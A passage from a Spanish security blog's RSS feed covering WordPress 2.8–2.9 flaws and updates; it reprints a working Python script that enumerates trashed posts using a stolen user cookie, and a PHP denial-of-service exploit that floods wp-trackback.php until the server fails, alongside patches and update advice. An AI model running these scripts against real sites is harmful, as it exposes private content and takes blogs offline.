href="http://tmacuk.co.uk/?p=180">Mackenzie</a> pudo solucionar desarrollando este script en Python, con el que enumera los contenidos que tenemos en nuestra &#8220;papelera&#8221;.<span
id="more-3856"></span></p><blockquote><p>#/usr/bin/python<br
/> #<br
/> # WordPress &gt; 2.9 Failure to Restrict URL Access PoC<br
/> #<br
/> # This script iterates through the WP post ID&#8217;s as an authenticated and unauthenticated user.<br
/> # If the requests differ a &#8216;Trash&#8217; post has been found.<br
/> #<br
/> # You will need an authenticated user cookie of any priveledge to run this script.<br
/> #<br
/> # Example cookie:<br
/> # wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8<br
/> #<br
/> # Will only work with WP URLs with the &#8216;/?p={int}&#8217; parameter. Would need to handle redirects (3xx) to handle all URL types.<br
/> #<br
/> #<br
/> # Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)</p><p>import httplib</p><p># Declare vars<br
/> blogURL = &#8220;www.example.com&#8221;<br
/> userCookie = &#8220;enter_cookie_here&#8221;<br
/> postID = 0 #Leave at 0</p><p>conn = httplib.HTTPConnection(blogURL)<br
/> Headers = {&#8220;Cookie&#8221; : userCookie}</p><p>print<br
/> print &#8220;Target = http://&#8221; + blogURL + &#8220;/?p=&#8221; + str(postID)<br
/> print</p><p>while 1:</p><p># Start non authenticated enumeration</p><p>request = &#8216;/?p=&#8217; + str(postID)<br
/> conn.request(&#8220;GET&#8221;, request, &#8220;&#8221;)</p><p>try:<br
/> r1 = conn.getresponse()<br
/> except:<br
/> print &#8220;Connection error&#8221;</p><p>data1 = r1.read()</p><p># Start authenticated enumeration</p><p>conn.request(&#8220;GET&#8221;, request, None, Headers)</p><p>try:<br
/> r2 = conn.getresponse()<br
/> except:<br
/> print &#8220;Connection error&#8221;</p><p>data2 = r2.read()</p><p># Compare the HTML body reponses</p><p>if data1 != data2:<br
/> print &#8220;+ Found! http://&#8221; + blogURL + request<br
/> else:<br
/> print request</p><p>postID += 1</p><p>conn.close()</p></blockquote><p
style="text-align: justify;">Como pueden ver, en esta prueba de concepto, es necesario contar con una cookie de un usuario logueado en el sistema, cosa que no es difícil si el blog tiene el registro de usuarios activo (practica poco recomendada) o se puede conseguir mediante ingeniería social, por lo tanto es mas que recomendable que <a
href="http://wordpress.org/download/">actualicen su instalación de WordPress a la versión 2.9.2</a> que ya cuenta con un parche para este problema de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>.</p><p
style="text-align: justify;">Una vez más queda confirmado que la seguridad por &#8220;oscuridad&#8221;  no es una buena práctica y siempre debe estar acompañada con otras medias que garanticen la confidencialidad, integridad y disponibilidad de nuestra información.</p><p
style="text-align: justify;"><strong>PD.</strong> Lo que no entiendo es por que páginas como <a
href="http://www.daboweb.com/2010/02/16/wordpress-2-9-2-disponible/">DaboWeb</a> y <a
href="http://mangasverdes.es/2010/02/15/wordpress-2-9-2-nueva-actualizacion-urgente/">Mangas Verdes</a> hablan de este fallo y afirman que un posible atacante puede &#8220;Eliminar artículos de nuestro WordPress&#8221; ¿De donde habrán sacado esa <a
href="http://www.dragonjar.org/tag/informacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Informacion">informacion</a>?&#8230;</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a
href="http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5">Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a
href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a
href="http://www.dragonjar.org/101-libros-de-seguridad-informatica-gratis.xhtml" title="101 Libros de Seguridad Informática Gratis">101 Libros de Seguridad Informática Gratis</a></li><li><a
href="http://www.dragonjar.org/bugcon.xhtml" title="BugCON 2012">BugCON 2012</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml/feed</wfw:commentRss> <slash:comments>12</slash:comments> </item> <item><title>Nueva versíon de WordPress 2.9</title><link>http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml</link> <comments>http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml#comments</comments> <pubDate>Fri, 18 Dec 2009 05:03:28 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Software]]></category> <category><![CDATA[Actualizar]]></category> <category><![CDATA[Version]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3503</guid> <description><![CDATA[La nueva versión de WordPress, el software para la creación de blogs mas utilizado en la red, ha salido a la luz con mas de 40 funcionalidades nuevas, entre las que se destacan las siguientes: Editor de Imágenes Online: Ahora WordPress contara con un editor de imágenes, escrito en javascript y que nos permitirá cortar [...]]]></description> <content:encoded><![CDATA[<p>La <a
href="http://www.dragonjar.org/tag/nueva" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con nueva">nueva</a> versión de <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a>, el software para la creación de blogs mas utilizado en la red, ha salido a la luz con mas de 40 funcionalidades nuevas, entre las que se destacan las siguientes:</p><p
style="text-align: center;"><img
class="alignnone" title="Wordpress 2.9" src="http://farm3.static.flickr.com/2614/4031483944_c613aa6089_o.jpg" alt="4031483944 c613aa6089 o Nueva versíon de WordPress 2.9" width="300" height="300" /></p><ul><li><strong>Editor de Imágenes Online</strong>: Ahora WordPress contara con un editor de imágenes, escrito en javascript y que nos permitirá cortar y rotar, funciones que hace mucho hacían falta</li><li><strong>Papelera</strong>: En esta nueva versión WordPress incorpora un sistema de papelera para nuestros post y comentarios borrados, para activarla debemos agregar la siguiente linea <em>define( &#8216;EMPTY_TRASH_DAYS&#8217;, 30 );</em> en nuestro <em>wp-config.<a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a></em> donde 30 son los días a guardar los post y comentarios en la papelera.<span
id="more-3503"></span></li><li><strong>Incrustación de multimedia</strong>: ya no hará falta el código embed, simplemente poniendo la URL mostrará el contenido, los sistemas soportados son: YouTube, Daily Motion, Blip.tv, Flickr, Hulu, Viddler, Qik, Revision3, Scribd, Google Video, Photobucket, PollDaddy, y WordPress.tv.</li><li><strong>Gestión de Multimedia</strong>: El gestor de contenidos multimedia se ha vuelto a escribir desde 0, para mejorar sus funcionalidades.</li><li><strong>Sistema de Actualización</strong>: Ahora es posible <a
href="http://www.dragonjar.org/tag/actualizar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Actualizar">actualizar</a> los plugins masivamente.</li><li><strong>Reparación de base de datos</strong>: Una nueva utilidad integrada en el sistema nos permite realizar una reparación de nuestra base de datos en caso de que tenga errores, para esto solo necesitamos añadir en el archivo  <em>wp-config.php</em> esta línea:  <em>define(’WP_ALLOW_REPAIR’, true);</em>. Después de reparada la tabla, la eliminamos.</li><li><strong><a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">Seguridad</a></strong>: Se han mejorado múltiples aspectos en la seguridad de WordPress y <a
href="http://core.trac.wordpress.org/query?status=closed&amp;milestone=2.9">reparados mas de 500 errores reportados</a>, esperemos que esta versión sea estable en cuanto a seguridad y no tengan que sacar nuevas versiones solo para corregir problemas de seguridad.</li></ul><p>La anterior lista son solo algunas de las nuevas funcionalidades de WordPress, si quieres ver todos los cambios<a
href="http://codex.wordpress.org/Version_2.9"> de esta versión 2.9 ingresa a este enlace</a>.</p><h2 style="text-align: center;"><a
href="http://wordpress.org/download/">Descargar WordPress 2.9</a></h2><p><strong>Mas Información:</strong><br
/> <a
href="http://codex.wordpress.org/Version_2.9">Codex Versión 2.9</a><br
/> <a
href="http://wordpress.org/development/2009/12/wordpress-2-9/">WordPress 2.9, oh so fine</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/wordpress-3-1.xhtml" title="WordPress 3.1">WordPress 3.1</a></li><li><a
href="http://www.dragonjar.org/descarga-wordpress-3-0.xhtml" title="Descarga WordPress 3.0">Descarga WordPress 3.0</a></li><li><a
href="http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5">Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</a></li><li><a
href="http://www.dragonjar.org/actualiza-a-wordpress-271.xhtml" title="Actualiza a WordPress 2.7.1">Actualiza a WordPress 2.7.1</a></li><li><a
href="http://www.dragonjar.org/actualiza-a-wordpress-265.xhtml" title="Actualiza a WordPress 2.6.5">Actualiza a WordPress 2.6.5</a></li><li><a
href="http://www.dragonjar.org/actualizar-backtrack-5-a-backtrack-5-r1-sin-reinstalar.xhtml" title="Actualizar BackTrack 5 a Backtrack 5 R1 sin reinstalar">Actualizar BackTrack 5 a Backtrack 5 R1 sin reinstalar</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/backtrack-5.xhtml" title="BackTrack 5">BackTrack 5</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml/feed</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>XSS que permite postear a atacante registrado en WordPress</title><link>http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml</link> <comments>http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml#comments</comments> <pubDate>Thu, 12 Nov 2009 07:56:06 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[WordPress]]></category> <category><![CDATA[XSS]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3341</guid> <description><![CDATA[Una nueva revisión de seguridad ha salido para la rama 2.8.x del popular WordPress, en esta ocasión se corrigen 2 fallos, el primero descubierto por el investigador en seguridad web  Benjamin Flesch, permite a un usuario registrado, por medio de un ataque XSS en la función “Publica esto” (Press this), publicar cualquier contenido en nuestra [...]]]></description> <content:encoded><![CDATA[<p>Una <a
href="http://www.dragonjar.org/tag/nueva" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con nueva">nueva</a> revisión de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> ha salido para la rama 2.8.x del popular <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a>, en esta ocasión se corrigen 2 fallos, el primero descubierto por el investigador en <a
href="http://www.dragonjar.org/tag/seguridad-web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad Web">seguridad web</a>  Benjamin Flesch, permite a un usuario registrado, por medio de un ataque <a
href="http://www.dragonjar.org/tag/xss" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XSS">XSS</a> en la función “Publica esto” (Press this), publicar cualquier contenido en nuestra pagina.</p><p
style="text-align: center;"><img
title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5" src="http://farm3.static.flickr.com/2614/4031483944_c613aa6089_o.jpg" alt="4031483944 c613aa6089 o XSS que permite postear a atacante registrado en WordPress"  /></p><p><span
id="more-3341"></span>El segundo problema <a
href="http://wordpress.org/development/2009/11/wordpress-2-8-6-security-release/">no es explicado claramente en el comunicado oficial de WordPress</a>, solo nos comentan que el error se  encuentra el sistema de archivos y que podría provocar vulnerabilidades en ciertas configuraciones de Apache y que lo ha Dawid Golunski.</p><p>Es recomendable que actualicen su versión de WordPress, ya sea por el panel de administración o <a
href="http://wordpress.org/">descargando la ultima version desde su pagina oficia</a>,  para asegurarse de que tiene la mejor protección disponible.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml" title="Revisa la seguridad de tu sitio web Gratis">Revisa la seguridad de tu sitio web Gratis</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a
href="http://www.dragonjar.org/los-blogs-alojados-en-wordpresscom-vulnerables.xhtml" title="Los Blogs alojados en WordPress.com Vulnerables ">Los Blogs alojados en WordPress.com Vulnerables </a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</title><link>http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml</link> <comments>http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml#comments</comments> <pubDate>Wed, 21 Oct 2009 07:08:09 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Software]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Actualizar]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3267</guid> <description><![CDATA[Desde hace unos meses los desarrolladores de wordpress están trabajando en lo que seria la versión 2.9 del famoso administrador de contenidos, pero debido a los eventos recientes relacionados con la seguridad en wordpress se han tomado una pausa para realizar un endurecimiento (hardening) a la seguridad de la rama 2.8.x con el fin de [...]]]></description> <content:encoded><![CDATA[<p>Desde hace unos meses los desarrolladores de <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">wordpress</a> están trabajando en lo que seria la versión 2.9 del famoso <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> de contenidos, pero debido a los eventos recientes relacionados con la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> en <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">wordpress</a> se han tomado una pausa para realizar un endurecimiento (hardening) a la seguridad de la rama 2.8.x con el fin de corregir y prevenir problemas de seguridad futuros.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://farm3.static.flickr.com/2614/4031483944_c613aa6089_o.jpg" alt="4031483944 c613aa6089 o Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5"  title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5" /></p><p>Por esta razón publican una <a
href="http://www.dragonjar.org/tag/nueva" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con nueva">nueva</a> <a
href="http://www.dragonjar.org/tag/version" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Version">version</a> de WordPress 2.8.5 en la que todos los cambios realizados son relacionados con la seguridad:<span
id="more-3267"></span></p><ul><li> Arreglaron el error del archivo wp-trackback.<a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a> que permitía una<a
title="Enlace permanente a Denegacion de Servicio en WordPress" rel="bookmark" href="../dos-en-wordpress.xhtml"> Denegacion de Servicio en WordPress </a></li><li>Realizaron una re validación de variables para que errores como los del trackback no ocurran de nuevo.</li><li>Se realizó un cambiado en el archivo que permite subir a la lista blanca  todos los usuarios, incluidos los Administradores.</li><li>Eliminados 2 importadores de etiquetas para plugins viejos.</li></ul><p>Es recomendable que se se actualicen a esta nueva versión de WordPress para asegurarse de que tiene la mejor protección disponible.</p><p>En el <a
href="http://wordpress.org/development/2009/10/wordpress-2-8-5-hardening-release/">anuncio realizado por Peter Westwood</a> se recomienda la utilización del plugin <a
href="http://wordpress.org/extend/plugins/exploit-scanner/">WordPress Exploit Scanner</a>, para buscar código sospechoso en la base de datos de los post y comentarios, mas <a
href="http://www.dragonjar.org/tag/informacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Informacion">informacion</a> sobre este plugin en su pagina oficial.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/backtrack-5.xhtml" title="BackTrack 5">BackTrack 5</a></li><li><a
href="http://www.dragonjar.org/descargar-backtrack-4-r1.xhtml" title="Descargar BackTrack 4 R1">Descargar BackTrack 4 R1</a></li><li><a
href="http://www.dragonjar.org/parchear-problema-de-seguridad-de-safari-en-iphone-ipod-touch-e-ipad.xhtml" title="Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad">Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad</a></li><li><a
href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li><li><a
href="http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml" title="Nueva versíon de WordPress 2.9">Nueva versíon de WordPress 2.9</a></li><li><a
href="http://www.dragonjar.org/desbloquea-jailbreak-firmware-3-1-2-iphone-y-ipod-touch.xhtml" title="Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch">Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml/feed</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>Denegacion de Servicio en WordPress</title><link>http://www.dragonjar.org/dos-en-wordpress.xhtml</link> <comments>http://www.dragonjar.org/dos-en-wordpress.xhtml#comments</comments> <pubDate>Sun, 18 Oct 2009 21:26:41 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Vulnerable]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3246</guid> <description><![CDATA[Jose Carlos Norte acaba de publicar en su blog, un nuevo fallo de seguridad descubierto en el popular wordpress, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con WordPress causando una denegacion de servicio. El bug se encuentra en el archivo wp-trackback.php quien no valida adecuadamente la [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">Jose Carlos Norte</a> acaba de publicar en su blog, un nuevo <a
href="http://www.dragonjar.org/tag/fallo" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con fallo">fallo</a> de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> descubierto en el popular <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">wordpress</a>, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a> causando una denegacion de servicio.</p><p
style="text-align: center;"><img
class="alignnone" title="Denegacion de Servicio WordPress" src="http://farm3.static.flickr.com/2715/4027319134_4ef81cac76_o.jpg" alt="4027319134 4ef81cac76 o Denegacion de Servicio en WordPress" width="256" height="222" /></p><p>El <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">bug</a> se encuentra en el archivo <strong>wp-trackback.<a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a></strong> quien no valida adecuadamente la variable <strong>$charset</strong>, permitiendo ingresar una peticion POST especialmente diseñada con una cantidad indeterminada de parámetros, causando un  gran consumo de memoria y CPU hasta que estos se agoten y el servidor deja de responder.<span
id="more-3246"></span></p><p>Todas las versiones de WordPress hasta el momento son vulnerables a este fallo (y según Jose Carlos, el parche que publicaría WordPress <a
href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">tampoco lo soluciona</a>), aunque dependiendo de la configuración individual de cada servidor, el problema es mayor o menor, por ejemplo un servido con <strong>mod_security</strong>, no seria <a
href="http://www.dragonjar.org/tag/vulnerable" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerable">vulnerable</a> ya que  bloquearía estas peticiones mal intencionadas,  también se pueden mitigar los daños con una adecuada configuración del parámetro <strong>php_memory_limit</strong> del <strong>php.ini</strong> para evitar que tus desarrollos web utilicen mas memoria de la que en realidad necesitan, podrías también utilizar el WP-IDS un mod para WordPress del PHPIDS (reseñado el la guía blanca de seguridad en wordpress <a
title="Enlace permanente a WordPress Security Whitepaper" rel="bookmark" href="../wordpress-security-whitepaper.xhtml">WordPress Security Whitepaper</a>) el cual bloquearía no solo estas peticiones sino muchos mas problemas de seguridad.</p><p>Les dejo la solución propuesta por Jose Carlos en su blog para este problema:</p><blockquote><p><code>Reemplazar en la linea 45 del archivo wp-trackback.php esto<br
/> <strong>$charset = $_POST['charset'];</strong></code></p><p>por esto<br
/> <strong>$charset =</strong> str_replace(”,”,”&#8221;,<strong>$_POST['charset']</strong>)<strong>;<br
/> </strong>if(is_array($charset)) { exit; }</p></blockquote><p>Y el <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a> para verificar que somos vulnerables:</p><blockquote><p><code>&lt;?php<br
/> //wordpress Resource exhaustion Exploit<br
/> //http://rooibo.wordpress.com/<br
/> //security@wordpress.org contacted and get a response,<br
/> //but no solution available.<br
/> if(count($argv) &lt; 2) {<br
/> echo “You need to specify a url to attack\n”;<br
/> exit;<br
/> }</code></p><p>$url = $argv[1];</p><p>$data = parse_url($url);<br
/> if(count($data) &lt; 2) {     echo “The url should have http:// in front of it, and should be complete.\n”;     exit;     }     if(count($data) == 2) {     $path = ”;     } else {     $path = $data['path'];     }     $path = trim($path,’/&#8217;);     $path .= ‘/wp-trackback.php’;     if($path{0} != ‘/’) {     $path = ‘/’.$path;     }     $b = “”;     $b = str_pad($b,140000,’ABCEDFG’);     $b = utf8_encode($b);     $charset = “”;     $charset = str_pad($charset,140000,”UTF-8,”);     $str = ‘charset=’.urlencode($charset);     $str .= ‘&amp;url=www.example.com’;     $str .= ‘&amp;title=’.$b;     $str .= ‘&amp;blog_name=lol’;     $str .= ‘&amp;excerpt=lol’;     $count = 0;     while(1) {     $fp = @fsockopen($data['host'],80);     if(!$fp) {     if($count &gt; 0) {<br
/> echo “down!!!!\n”;<br
/> exit;<br
/> }<br
/> echo “unable to connect to: “.$data['host'].”\n”;<br
/> exit;<br
/> }</p><p>fputs($fp, “POST $path HTTP/1.1\r\n”);<br
/> fputs($fp, “Host: “.$data['host'].”\r\n”);<br
/> fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);<br
/> fputs($fp, “Content-length: “.strlen($str).”\r\n”);<br
/> fputs($fp, “Connection: close\r\n\r\n”);<br
/> fputs($fp, $str.”\r\n\r\n”);</p><p>echo “hit!\n”;<br
/> $count++;<br
/> }</p><p>?&gt;</p></blockquote><p><strong>Para mas <a
href="http://www.dragonjar.org/tag/informacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Informacion">informacion</a>:</strong><br
/> <a
title="Enlace Permanente a &quot;Agujero de seguridad muy grave en WordPress&quot;" rel="bookmark" href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">Agujero de seguridad muy grave en WordPress</a><br
/> <a
id="thread_title_8527" href="http://comunidad.dragonjar.org/f150/atencion-bug-wordpress-8527/">Atención! BUG WordPress</a><br
/> <a
title="Enlace permanente a WordPress Security Whitepaper" rel="bookmark" href="../wordpress-security-whitepaper.xhtml">WordPress Security Whitepaper </a></p><div
id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 996px; width: 1px; height: 1px;">$charset = $_POST['charset'];</div><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/entrar-en-facebook-de-otra-persona.xhtml" title="como entrar al facebook de otra persona">como entrar al facebook de otra persona</a></li><li><a
href="http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml" title="Buffer Overflow en PHP 6 Dev">Buffer Overflow en PHP 6 Dev</a></li><li><a
href="http://www.dragonjar.org/lista-de-tareas-seguridad-en-php.xhtml" title="Lista de tareas para revisar la seguridad en proyectos PHP">Lista de tareas para revisar la seguridad en proyectos PHP</a></li><li><a
